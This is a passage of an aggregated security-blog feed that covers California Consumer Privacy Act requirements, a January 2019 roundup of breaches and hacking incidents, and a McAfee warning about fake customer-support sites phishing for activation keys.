        • Has annual gross revenues greater than $25 million; or
        • Receives or shares the personal information of 50,000 or more California consumers for monetary or other valuable consideration; or
        • Receives 50% or more of its annual revenue from selling consumer personal information.
      • “Personal Information now explicitly includes IP addresses, geolocation data, and unique identifiers such as cookies, beacons, pixel tags, browsing history, and another electronic network information. Consumer Information includes information that relates to households.
      • The California Attorney General will enforce the law, though Californians have a private right of action limited to circumstances where there is an unauthorized access to nonencrypted personal information or “disclosure of personal information because of a business failure to implement and maintain reasonable security procedures.”
      • Violators of the law are subject to civil penalties of up $2500 per each unintentional violation—failing to cure a violation within 30 days of receiving noncompliance notification from the California Attorney General—and a maximum of $7,500 for each intentional violation (not acknowledging the request for data, for example) if the civil action is brought by the California Attorney General.

      What Does This All Mean?

      Regulators are working on guidance, and there is still time for amendments to be made on the law, so things might change before the law goes into effect. Residents of the European Economic Area have been exercising their data subject access rights since late May. Now, Californians will join them in being able to similarly ask about the data that CCPA-applicable companies hold about them. The CCPA gives companies a 45-day window to comply with an individual’s request for access to data or deletion (a Data Subject Access Request, or DSAR) in contrast to the GDPR’s 30 days.

      Companies may need to prepare for an increase in DSARs and implement new features to comply with the law, like providing two communication methods for consumers electing to exercise their rights (web portal, email address, toll free telephone number, or another viable mode of communication) and provide a conspicuous link on the company’s website that informs the consumer of her CCPA rights.

      The California Legislature’s reference to Cambridge Analytica makes it apparent that legislators expect businesses to exercise transparency in their consumer data use practices. Even without legislative nudging, companies are slowly recognizing value in sound privacy and data governance practices. Companies no longer see privacy as a mere compliance checkbox, but instead as a competitive advantage that simultaneously builds consumer confidence.

      We may see more changes to the California law, and we likely will see other laws come in to play both in the United States and abroad (Brazil, China, India, etc.), but companies with privacy in their DNA will have an edge over companies scrambling to meet compliance efforts.

      The post California Consumer Privacy Act appeared first on McAfee Blogs.

      Cyber Security Roundup for January 2019

      The first month of 2019 was a relatively slow month for cyber security in comparison with the steady stream of cyber attacks and breaches throughout 2018.  On Saturday 26th January, car services and repair outfit Kwik Fit told customers its IT systems had been taken offline due to malware, which disputed its ability to book in car repairs. Kwik Fit didn't provide any details about the malware, but it is fair to speculate that the malware outbreak was likely caused by a general lack of security patching and anti-virus protection as opposed to anything sophisticated.

      B&Q said it had taken action after a security researcher found and disclosed details of B&Q suspected store thieves online. According to Ctrlbox Information Security, the exposed records included 70,000 offender and incident logs, which included: the first and last names of individuals caught or suspected of stealing goods from stores descriptions of the people involved, their vehicles and other incident-related information the product codes of the goods involved the value of the associated loss.

      Hundreds of German politicians, including Chancellor Angela Merkel, have had personal details stolen and published online at the start of January.  A 20 year suspect was later arrested in connection to this disclosure. Investigators said the suspect had acted alone and had taught himself the skills he needed using online resources, and had no training in computer science. Yet another example of the low entry level for individuals in becoming a successful and sinister hacker.

      Hackers took control of 65,000 Smart TVs around the world, in yet another stunt to support YouTuber PewDiePie. A video message was displayed on the vulnerable TVs which read "Your Chromecast/Smart TV is exposed to the public internet and is exposing sensitive information about you!" It then encourages victims to visit a web address before finishing up with, "you should also subscribe to PewDiePie"
      Hacked Smart TVs: The Dangers of Exposing Smart TVs to the Net

      The PewDiePie hackers said they had discovered a further 100,000 vulnerable devices, while Google said its products were not to blame, but were said to have fixed them anyway. In the previous month two hackers carried out a similar stunt by forcing thousands of printers to print similar messages. There was an interesting video of the negative impact of that stunt on the hackers on the BBC News website - The PewDiePie Hackers: Could hacking printers ruin your life?

      Security company ForeScout said it had found thousands of vulnerable devices using search engines Shodan and Cenys, many of which were located in hospitals and schools. Heating, ventilation, and air conditioning (HVAC) systems were among those that the team could have taken control over after it developed its own proof-of-concept malware.

      Reddit users found they were locked out of their accounts after an apparent credential stuffing attack forced a mass password invoke by Reddit in response. A Reddit admin said "large group of accounts were locked down" due to anomalous activity suggesting unauthorised access."

      Kaspersky reported that 30 million cyber attacks were carried out in the last quarter of 2018, with cyber attacks via web browsers reported as the most common method for spreading malware.

      A new warning was issued by Action Fraud about a convincing TV Licensing scam phishing email attack made the rounds. The email attempts to trick people with subject lines like "correct your licensing information" and "your TV licence expires today" to convince people to open them. TV Licensing warned it never asks for this sort of information over email.

      January saw further political pressure and media coverage about the threat posed to the UK national security by Chinese telecoms giant Huawei, I'll cover all that in a separate blog post.


      BLOG
      NEWS
      AWARENESS, EDUCATION AND THREAT INTELLIGENCE
      REPORTS

      Customer Support Scams Are Popping up in Social Media Ads: How to Stay Secure

      Many of us rely on customer support websites for navigating new technology. Whether it’s installing a new piece of software or troubleshooting a computer program, we look to customer support to save the day. Unfortunately, cybercriminals are leveraging our reliance on customer support pages to access our personal information for financial gain. It appears that a malicious website is attempting to trick users into handing over their McAfee activation keys and personally identifiable information (PII) data by disguising themselves as the official McAfee customer support website.

      So how exactly does this cyberthreat work? First, malicious actors advertise the fake website on Twitter. If a user clicks on the ad, they are presented with a “Download McAfee” button. When the user clicks on the download button, they are redirected to a screen prompting them to enter their name, email address, contact number, and product activation key to proceed with the download. However, when the user clicks on the “Start Download” button, they are redirected to a screen stating that their download failed due to an unexpected error.

       

      At this point, the site owner has received the user’s personal data, which they could exploit in a variety of ways. And while this scheme may seem tricky to spot, there are a number of ways users can defend themselves from similar scams:

      • Be vigilant when clicking on social media links. Although it may be tempting to click on advertisements on your social media feed, these ads could possibly house sketchy websites developed by cybercriminals. Use caution when interacting with social media ads.
      • Go straight to the source. If you come across an advertisement claiming to be from a company and the link asks for personal data, it’s best to go directly to the company’s website instead. Use the official McAfee customer support page if you require technical support or assistance with your McAfee product.
      • Use security software. A security solution like McAfee WebAdvisor can help you spot suspicious websites and protect you from accidentally clicking on malicious links.

      And, as always, to stay on top of the latest consumer and mobile security threats, be sure to follow @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

      The post Customer Support Scams Are Popping up in Social Media Ads: How to Stay Secure appeared first on McAfee Blogs.